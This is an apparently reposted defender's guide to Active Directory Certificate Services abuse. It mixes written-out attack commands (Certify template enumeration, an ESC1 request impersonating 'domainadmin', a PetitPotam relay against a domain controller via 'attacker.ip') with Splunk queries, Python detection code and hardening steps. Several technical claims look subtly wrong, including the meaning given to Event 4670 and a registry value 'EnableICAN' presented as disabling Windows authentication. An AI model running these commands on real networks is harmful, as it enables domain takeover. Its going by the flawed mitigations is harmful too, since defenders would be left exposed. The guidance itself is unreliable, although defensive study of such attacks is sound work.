Breaking the Chain: A Defender’s Guide to Thwarting Certificate Services Abuse


Introduction:

Active Directory Certificate Services (AD CS) has become a prime target for sophisticated attackers, enabling them to escalate privileges, forge credentials, and maintain persistence deep within a network. Understanding the mechanics of these attacks is no longer optional for modern cybersecurity professionals; it is a critical line of defense for protecting core identity infrastructure.

Learning Objectives:

  • Understand the core AD CS vulnerabilities and common attack vectors like ESC1 and ESC8.
  • Learn to implement detective controls using Splunk and other tools to identify malicious certificate activity.
  • Master the mitigation strategies and hardening techniques to secure your PKI environment.

You Should Know:

1. Enumerating Vulnerable Certificate Templates with Certify

Attackers first need to discover certificate templates that allow for domain escalation. Tools like Certify automate this discovery.

Command:

Certify.exe find /vulnerable

Step-by-step guide:

This command, executed from a compromised user context, queries the Active Directory Certificate Authority (CA). It lists all certificate templates, highlighting those with configurations that make them susceptible to abuse, such as templates that allow low-privilege users to enroll, specify a manager approval, or permit client authentication. The output will clearly identify templates vulnerable to techniques like ESC1, which allows for authentication as any user if the `ENROLLEE_SUPPLIES_SUBJECT` flag is misconfigured.

2. Requesting a Malicious Certificate with Certify

Once a vulnerable template is identified, an attacker can request a certificate that grants them elevated privileges.

Command:

Certify.exe request /ca:dc.domain.com\ca-name /template:VulnerableWebServer /altname:domainadmin

Step-by-step guide:

This command submits a certificate request to the specified CA (/ca:dc.domain.com\ca-name) for the vulnerable template (/template:VulnerableWebServer). The critical parameter is /altname:domainadmin, which exploits the template’s misconfiguration to insert an alternative subject name. The returned certificate can then be used with tools like Rubeus to request a Ticket-Granting-Ticket (TGT) for the “domainadmin” account, effectively granting the attacker that user’s privileges.

3. Detecting Certificate Theft with Windows Security Logs

Detecting the theft of a certificate’s private key is crucial for identifying a potential attack in progress.

Command (Splunk SPL):

index=windows EventCode=4670 | table _time, SubjectUserName, ProcessName, ObjectName

Step-by-step guide:

Windows Event ID 4670 is generated when a user performs a backup operation on a private key. This Splunk query surfaces all such events, displaying the time, the user who performed the action, the process used, and the name of the certificate key. A sudden spike in these events, especially from unexpected users or from processes such as `certsrv.msc` or `certutil.exe`, is a high-fidelity indicator of credential theft activity.
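The two conditions the paragraph describes (an unexpected user/process pair, and a burst of key operations from one user) can be checked offline against records shaped like the Splunk table above. This is an added example, not code from the original post or from Splunk; the sample records, the `EXPECTED` pair and the window/burst thresholds are constructed assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample records shaped like the Splunk table in section 3
# (_time, SubjectUserName, ProcessName, ObjectName). Not real log data.
EVENTS = [
    {"_time": "2024-05-01T09:00:10", "SubjectUserName": "svc-pki-backup",
     "ProcessName": "C:\\Windows\\System32\\wbengine.exe", "ObjectName": "CA-KEY-01"},
    {"_time": "2024-05-01T09:01:05", "SubjectUserName": "jdoe",
     "ProcessName": "C:\\Windows\\System32\\certutil.exe", "ObjectName": "CA-KEY-01"},
    {"_time": "2024-05-01T09:01:30", "SubjectUserName": "jdoe",
     "ProcessName": "C:\\Windows\\System32\\certutil.exe", "ObjectName": "WEB-TLS-KEY"},
    {"_time": "2024-05-01T09:02:00", "SubjectUserName": "jdoe",
     "ProcessName": "C:\\Windows\\System32\\certutil.exe", "ObjectName": "USER-AUTH-KEY"},
    {"_time": "2024-05-01T14:20:00", "SubjectUserName": "svc-pki-backup",
     "ProcessName": "C:\\Windows\\System32\\wbengine.exe", "ObjectName": "CA-KEY-01"},
]

# Assumption: the backup service account running the backup engine is the
# only (user, process) pair expected to touch private keys in this environment.
EXPECTED = {("svc-pki-backup", "wbengine.exe")}


def process_basename(path):
    """'C:\\Windows\\System32\\certutil.exe' -> 'certutil.exe'."""
    return path.rsplit("\\", 1)[-1].lower()


def alert_on_key_backup(events, window=timedelta(minutes=10), burst=3):
    """Flag records from an unexpected user/process pair, and any user that
    touches `burst` or more distinct keys inside `window` (a spike)."""
    alerts = []
    by_user = defaultdict(list)
    for e in events:
        pair = (e["SubjectUserName"].lower(), process_basename(e["ProcessName"]))
        if pair not in EXPECTED:
            alerts.append(("unexpected-actor", e["SubjectUserName"], e["ObjectName"]))
        by_user[e["SubjectUserName"]].append(
            (datetime.fromisoformat(e["_time"]), e["ObjectName"]))
    for user, items in by_user.items():
        items.sort()
        for i, (t0, _) in enumerate(items):
            keys_in_window = {obj for t, obj in items[i:] if t - t0 <= window}
            if len(keys_in_window) >= burst:
                alerts.append(("burst", user, len(keys_in_window)))
                break  # one burst alert per user is enough
    return alerts
```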

4. Exploiting ESC8 with PetitPotam

The ESC8 vulnerability abuses the AD CS Web Enrollment service: the attacker coerces the domain controller into authenticating to an attacker-controlled machine and relays that authentication to the enrollment endpoint.

Command:

python3 PetitPotam.py -d domain.com -u user -p password attacker.ip dc.domain.com

Step-by-step guide:

This Python script targets the domain controller (dc.domain.com). It tricks the DC into connecting to the attacker’s machine (attacker.ip) via the WebClient service. The attacker’s machine, running a tool like Impacket’s ntlmrelayx.py, relays the captured authentication attempt to the AD CS web enrollment port (HTTP/80). This can force the DC to request a certificate for itself, which the attacker can then use for full domain compromise.

5. Hardening Against NTLM Relay Attacks (ESC8 Mitigation)

The primary mitigation for ESC8 is to disable NTLM authentication on the AD CS web enrollment service, forcing the use of Kerberos, which is not relayable.

Command (Windows Registry):

reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\HTTP\Parameters /v EnableICAN /t REG_DWORD /d 0

Step-by-step guide:

This registry command disables Integrated Windows Authentication (IWA) on the IIS server, which is a prerequisite for the PetitPotam relay attack. The change requires a restart of the IIS service (iisreset /noforce). It is a critical hardening step but should be tested in a development environment first, as it may impact legacy applications that rely on IWA.

6. Enabling Certificate Enrollment Auditing

To detect malicious enrollment requests, you must first enable the relevant auditing policies in Windows.

Command (Group Policy – Audit Policy):

Computer Configuration -> Windows Settings -> Security Settings -> Advanced Audit Policy Configuration -> Object Access -> "Audit Certification Services" (Success and Failure)

Step-by-step guide:

Navigate to the Group Policy Management Editor on your domain controller or a policy linked to your CA servers. Enable the “Audit Certification Services” policy for both success and failure. Once applied, this will generate Event ID 4886 (certificate enrollment request) and 4887 (certificate issuance) in the Windows Security log, providing a detailed audit trail for all certificate-related activities.
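Once 4886/4887 auditing is on, the ESC1 pattern from section 2 (a low-privilege requester obtaining a certificate whose subject alternative name names a different account) can be hunted by correlating the two events on their request ID. This is an added example, not code from the original post or from Splunk; the sample records are constructed, and it assumes the SAN is visible in the event's `Attributes` field (as it is when the requester passes it as a request attribute), so a SAN carried only inside the CSR would need the issued certificate itself to be inspected.

```python
import re

# Constructed 4886 (request received) and 4887 (certificate issued) records,
# reduced to the fields this example needs. Not real Security log data.
SAMPLE_EVENTS = [
    {"EventCode": 4886, "RequestId": "101", "Requester": "CORP\\jdoe",
     "Attributes": "CertificateTemplate:User"},
    {"EventCode": 4887, "RequestId": "101", "Requester": "CORP\\jdoe",
     "Attributes": "CertificateTemplate:User", "Subject": "CN=jdoe,OU=Users,DC=corp,DC=com"},
    # Requester supplied a SAN for another account on an enrollee-supplies-subject template
    {"EventCode": 4886, "RequestId": "102", "Requester": "CORP\\jdoe",
     "Attributes": "CertificateTemplate:VulnerableWebServer\nSAN:upn=domainadmin@corp.com"},
    {"EventCode": 4887, "RequestId": "102", "Requester": "CORP\\jdoe",
     "Attributes": "CertificateTemplate:VulnerableWebServer\nSAN:upn=domainadmin@corp.com",
     "Subject": "CN=jdoe,OU=Users,DC=corp,DC=com"},
    # A SAN naming the requester's own account is benign and must not be flagged
    {"EventCode": 4887, "RequestId": "103", "Requester": "CORP\\asmith",
     "Attributes": "CertificateTemplate:User\nSAN:upn=asmith@corp.com",
     "Subject": "CN=asmith,OU=Users,DC=corp,DC=com"},
]

SAN_UPN = re.compile(r"SAN:.*?upn=([^,\s@]+)@", re.IGNORECASE)
TEMPLATE = re.compile(r"CertificateTemplate:(\S+)", re.IGNORECASE)


def requester_account(requester):
    """'CORP\\jdoe' -> 'jdoe' (strip the domain prefix, normalise case)."""
    return requester.split("\\")[-1].lower()


def find_san_mismatches(events):
    """Correlate 4886 with 4887 by RequestId and return every issued
    certificate whose SAN UPN names an account other than the requester."""
    requests = {e["RequestId"]: e for e in events if e["EventCode"] == 4886}
    findings = []
    for e in events:
        if e["EventCode"] != 4887:
            continue
        attrs = e.get("Attributes", "")
        san = SAN_UPN.search(attrs)
        if not san or san.group(1).lower() == requester_account(e["Requester"]):
            continue  # no SAN supplied, or SAN is the requester's own account
        tmpl = TEMPLATE.search(attrs)
        findings.append({"RequestId": e["RequestId"], "Requester": e["Requester"],
                         "SanUpn": san.group(1),
                         "Template": tmpl.group(1) if tmpl else None,
                         "RequestSeen": e["RequestId"] in requests})
    return findings
```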

7. Configuring CA Security Settings to Restrict Enrollment

Proactively hardening the CA itself by modifying template permissions is a fundamental mitigation.

Command (via `certtmpl.msc` GUI):

1. Open `certtmpl.msc`.
2. Right-click a template (e.g., User) and select Properties.
3. Go to the `Security` tab.
4. Ensure that only authorized groups (e.g., Domain Admins, specific security groups) have Enroll permissions. Remove Enroll from broad groups like Authenticated Users where possible.

Step-by-step guide:

This graphical tool is the standard for managing certificate templates. The principle of least privilege is paramount. By removing enroll permissions from “Authenticated Users” on highly privileged templates and granting them only to specific, necessary security groups, you drastically reduce the attack surface. This directly counters attacks that rely on abusing template misconfigurations available to any domain user.

What Undercode Say:

  • The abuse of AD CS represents a fundamental shift toward attacking identity and trust services, moving beyond traditional credential dumping.
  • Defenders must assume their PKI is a primary target and implement a strategy of continuous monitoring and hardening, as many environments have vulnerable configurations by default.

The analysis from the original Splunk deep dive and subsequent community research confirms that AD CS abuse is not a fleeting trend but a mature attack methodology. Its prevalence in both red team exercises and real-world intrusions underscores a widespread gap in defensive postures. Many organizations built their PKI infrastructure years ago with default, permissive settings that are now being weaponized. The defensive playbook is clear: comprehensive auditing to establish a baseline, aggressive hardening of templates and services, and deploying targeted detections for known TTPs. The challenge lies not in a lack of tools, but in the operational rigor required to manage these critical identity systems proactively.

Prediction:

The evolution of AD CS attacks will continue to outpace default enterprise configurations. We predict a rise in fileless, “living-off-the-land” techniques that use native Windows tools like `certreq.exe` and `certutil.exe` for these attacks, making detection even more challenging. Furthermore, as cloud-based PKI services gain adoption, attackers will pivot to find analogous misconfigurations and trust abuses in hybrid and cloud-native identity systems, making the lessons learned from defending on-premises AD CS more valuable than ever.

Reported By: Michaelahaag Breaking – Hackers Feeds